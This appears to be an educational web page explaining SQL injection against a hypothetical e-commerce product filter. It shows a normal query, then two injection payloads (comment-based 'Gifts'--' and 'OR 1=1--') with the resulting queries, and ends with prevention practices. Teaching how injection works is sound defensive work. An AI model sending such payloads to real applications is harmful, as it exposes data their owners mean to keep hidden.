Skip to content
Ultimate Degree

SQL Injection Data Retrieval

SQL Injection attacks manipulate SQL queries to access unauthorized data. This can be achieved by exploiting vulnerabilities in an application to retrieve hidden data or sensitive information from the database. Attackers can manipulate SQL queries executed by the application to reveal data that is not intended to be accessible.

Example Scenario

Normal Application Flow

Consider an e-commerce application displaying products by category:

https://insecure-website.com/products?category=Gifts

The application executes this SQL query:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

Query Structure Breakdown

  • Target: All columns (*) from products table.
  • Filters:
    • category = 'Gifts': Only products in the ‘Gifts’ category.
    • released = 1: Only products that have been released.
    • Hidden products have released = 0.

Attack Techniques

1. Comment-Based Injection

Payload:
https://insecure-website.com/products?category=Gifts'--
Resulting Query:
SELECT * FROM products WHERE category = 'Gifts'--' AND released = 1
How it works:
  • The -- comments out the rest of the query, everything after Gifts is ignored.
  • This bypasses the AND released = 1 filter, revealing hidden products.

2. OR-Based Injection

Payload:
https://insecure-website.com/products?category=Gifts' OR 1=1--
Resulting Query:
SELECT * FROM products WHERE category = 'Gifts' OR 1=1--' AND released = 1
How it works:
  • Adds OR 1=1 to the WHERE clause, which is always true.
  • Returns all products, including hidden ones.
  • Comment removes the released filter.

Vulnerability Analysis

  1. The application constructs SQL queries using unvalidated user input.
  2. The category parameter comes directly from the URL.
  3. The released filter acts as a security control hiding unreleased products.

Security Impact

  • Attacker can modify the query structure.
  • Potential unauthorized access to unreleased products.
  • Risk of exposing sensitive business data.

Best Practices to Prevent SQL Injection

  1. Use parameterized queries
  2. Validate user input
  3. Apply proper access controls
  4. Implement query whitelisting